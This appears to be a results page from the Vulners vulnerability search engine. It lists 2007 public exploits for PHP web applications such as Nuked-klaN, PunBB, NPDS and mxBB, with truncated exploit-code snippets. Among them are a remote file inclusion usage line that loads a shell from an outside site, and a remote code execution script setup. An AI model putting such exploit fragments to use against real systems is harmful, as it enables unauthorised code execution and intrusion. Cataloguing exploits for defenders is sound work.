CVE Search Engine - Security Vulnerabilities and Exploits Search Tool | Vulners.com

🔥 Daily Hot!

💪🏽 CPE Enhanced Advisories

🕶 Shadow Exploits

🕵🏼 Vulners CPE

🔐 Security news

💻 Exploit updates

📑 Blogs review

🐧 Linux vulnerabilities

🤖 AI High Score

show all

1826 matches found

0day.today•added 2007/05/20 12:0 a.m.•13 views

AlstraSoft Template Seller Pro <= 3.25 Admin Password Change Exploit

Exploit for unknown platform in category web applications ==================================================================== AlstraSoft Template Seller Pro = 3.25 Admin Password Change Exploit ==================================================================== !/usr/bin/php -q -d shortopentag=...

seebug.org•added 2007/05/06 12:0 a.m.•16 views

Nuked-klaN 1.7.6 Remote Code Execution Exploit

No description provided by source. ?php Nuked-klaN 1.7.6 Remote Code Execution Exploit ------------------------------------------------ Author: DarkFig [email protected] Website: http://www.acid-root.new.fr/ PHP conditions: None = Private since 2 months. errorreportingEALL ^ ENOTICE; This file...

exploitpack•added 2007/05/05 12:0 a.m.•9 views

Nuked-klaN 1.7.6 - Remote Code Execution

Nuked-klaN 1.7.6 - Remote Code Execution Website: http://www.acid-root.new.fr/ PHP conditions: None = Private since 2 months. errorreportingEALL ^ ENOTICE; This file require the PhpSploit class. $xpl = new phpsploit; $url = 'http://localhost/nk/'; url $prx = ''; proxy : $pra = ''; basic...

Exploit DB•added 2007/05/05 12:0 a.m.•29 views

Nuked-klaN 1.7.6 - Remote Code Execution

Website: http://www.acid-root.new.fr/ PHP conditions: None = Private since 2 months. errorreportingEALL ^ ENOTICE; This file require the PhpSploit class. $xpl = new phpsploit; $url = 'http://localhost/nk/'; url $prx = ''; proxy : $pra = ''; basic authentification $xpl-agent"Firefox";...

0day.today•added 2007/05/05 12:0 a.m.•12 views

Nuked-klaN 1.7.6 Remote Code Execution Exploit

Exploit for unknown platform in category web applications ============================================== Nuked-klaN 1.7.6 Remote Code Execution Exploit ============================================== : $pra = ''; basic authentification $xpl-agent"Firefox"; $xpl-allowredirection0; $xpl-cookiejar0;...

exploitpack•added 2007/05/04 12:0 a.m.•18 views

RunCMS 1.5.2 - debug_show.php SQL Injection

RunCMS 1.5.2 - debugshow.php SQL Injection no authentication is performed to run showfiles and showqueries functions, look at this now in /class/debug/debug.php: ... function showqueries$executedqueries, $sorted=0 global $db; $executedqueries = unserializeurldecode$executedqueries; if $sorted == ...

Packet Storm•added 2007/05/03 12:0 a.m.•37 views

mxbb-rfi.txt

!/usr/bin/php -q -d shortopentag=on cmd: a shell command ls -la Options: -pport: specify a port other than 80 -Pip:port: specify a proxy Example: php '.$argv0.' localhost http://www.shellsite.com/shell.txt ls -la -P1.1.1.1:80 shell.txt:...

Packet Storm•added 2007/05/03 12:0 a.m.•19 views

tcexam-inject.txt

resource = array; // set selecteed language $this-language = strtoupper$language; // set filename for cache $this-cachefile = $cachefile; if fileexists$this-cachefile // read data from cache requireonce$this-cachefile; $this-resource = $tmx; else if !empty$this-cachefile // open cache file...

Exploit DB•added 2007/05/02 12:0 a.m.•30 views

mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion

!/usr/bin/php -q -d shortopentag=on cmd: a shell command ls -la Options: -pport: specify a port other than 80 -Pip:port: specify a proxy Example: php '.$argv0.' localhost http://www.shellsite.com/shell.txt ls -la -P1.1.1.1:80 shell.txt:...

seebug.org•added 2007/04/20 12:0 a.m.•72 views

3proxy HTTP Proxy请求远程缓冲区溢出漏洞

3Proxy是一款小型的代理软件。 3Proxy处理HTTP代理请求存在缓冲区溢出，远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。目前没有详细漏洞细节提供。 3proxy 3proxy 0.6b devel 20061014 3proxy 3proxy 0.5.3g 3proxy 3proxy 0.5 升级到最新程序： http://3proxy.ru/0.5.3h/Changelog.txt...

0day.today•added 2007/04/15 12:0 a.m.•25 views

XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit

Exploit for unknown platform in category remote exploits ============================================================== XAMPP for Windows Connect$POST'host', $POST'user', $POST'password', $POST'database'; echo "DBServer: $POSTdbserver"; $result = $db-Execute"SELECT FROM $POSTtable";...

seebug.org•added 2007/04/11 12:0 a.m.•14 views

PunBB <= 1.2.14 Remote Code Execution Exploit

No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; if$argc 7 print" ----------- PunBB = 1.2.14 Remote Code Execution Exploit ----------- ----------------------------------------------------------------------- PHP conditions: See...

Exploit DB•added 2007/04/11 12:0 a.m.•23 views

PunBB 1.2.14 - Remote Code Execution

!/usr/bin/php URL: http://www.acid-root.new.fr/ ----------------------------------------------------------------------- Usage: $argv0 -url -usr -pwd Options Params: -url For example http://victim.com/punBB/ -usr User account 1 post at least -pwd Password account Options: -uid Admin id default=2...

exploitpack•added 2007/04/06 12:0 a.m.•43 views

SmodCMS 2.10 - Slownik ssid SQL Injection

SmodCMS 2.10 - Slownik ssid SQL Injection 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex = '...

exploitpack•added 2007/04/05 12:0 a.m.•7 views

phpMyNewsletter 0.8 (beta5) - Multiple Vulnerabilities

phpMyNewsletter 0.8 beta5 - Multiple Vulnerabilities !/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc Delete Config Value Rude Attack - can't do anything after 2 - Send an Email to all of the subscribers Do not alter anything Related: 1 - None...

Packet Storm•added 2007/04/04 12:0 a.m.•27 views

mybb-exec.txt

!/usr/bin/php escapestring. They don't corrected the function this is a choice ... the bad and they forgot to correct 1 only SQL request. They must correct the problem at the source = if$argc URL: http://www.acid-root.new.fr/ -----------------------------------------------------------------------...

Exploit DB•added 2007/04/01 12:0 a.m.•33 views

WinMail Server 4.4 build 1124 - 'WebMail' Remote Add Super User

tempfolder."sessions/".$this-sid.".sess"; if!fileexists$sessionfile return false; $size = filesize$sessionfile; $fp = fopen$sessionfile, "rb"; if $fp $result = fread$fp, $size; fclose$fp; $result = unserializebase64decode$result; return $result; ... This function should check for session files...

seebug.org•added 2007/03/19 12:0 a.m.•36 views

Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution

No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; Advisory soon if$argc 3 print" TITLE | Net Portal Dynamic System NPDS = 5.10 Remote Code Execution 0day AUTHOR | DarkFig / http://www.acid-root.new.fr / [email protected] NOTE | Works regardless of php settings...

exploitpack•added 2007/03/18 12:0 a.m.•25 views

Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (1)

Net Portal Dynamic System NPDS 5.10 - Remote Code Execution 1 !/usr/bin/php Options OPTIONS | -proxy If you wanna use a proxy | -proxyauth Basic authentification ";exit1; $url = getparam'url',1; $pro = getparam'proxy'; $pra = getparam'proyauth'; $xpl = new phpsploit; $xpl-agent'Mozilla Firefox';...

exploitpack•added 2007/03/17 12:0 a.m.•13 views

phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution

phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution source: https://www.securityfocus.com/bid/23008/info PhpStats is prone to a remote code-execution vulnerability because the application fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary PHP...

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by